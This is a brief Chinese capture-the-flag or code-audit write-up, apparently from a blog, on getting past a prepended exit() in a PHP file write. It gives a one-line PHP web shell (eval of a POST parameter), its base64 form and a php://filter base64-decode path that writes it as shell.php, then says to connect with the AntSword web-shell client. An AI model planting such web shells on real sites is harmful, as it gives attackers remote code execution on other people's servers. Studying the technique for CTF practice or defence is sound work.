代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
一行注释15 分钟前
零宽字符Zero-Width Characters软件供应链安全指南1 小时前
悬镜安全:情报驱动的供应链安全治理仰泳之鹅1 小时前
【杂谈】如何将文件夹列入白名单以避免被安全中心当做病毒删掉软件供应链安全指南1 小时前
权威认证加持!云鲨RASP v4.0:信通院认可的应用内生安全防御标杆内心如初1 小时前
09_等保系列之等保2.0安全解决方案2501_948120152 小时前
云原生应用的安全开发与防护策略国科安芯2 小时前
RISC-V架构抗辐照MCU在航天器载荷中的SEU/SEL阈值测试与防护策略冬奇Lab3 小时前
【Kotlin系列13】DSL设计:构建类型安全的领域语言介一安全3 小时前
渗透信息收集爬虫工具 Katana 使用指南戴西软件3 小时前
戴西软件发布3DViz设计与仿真数据轻量化平台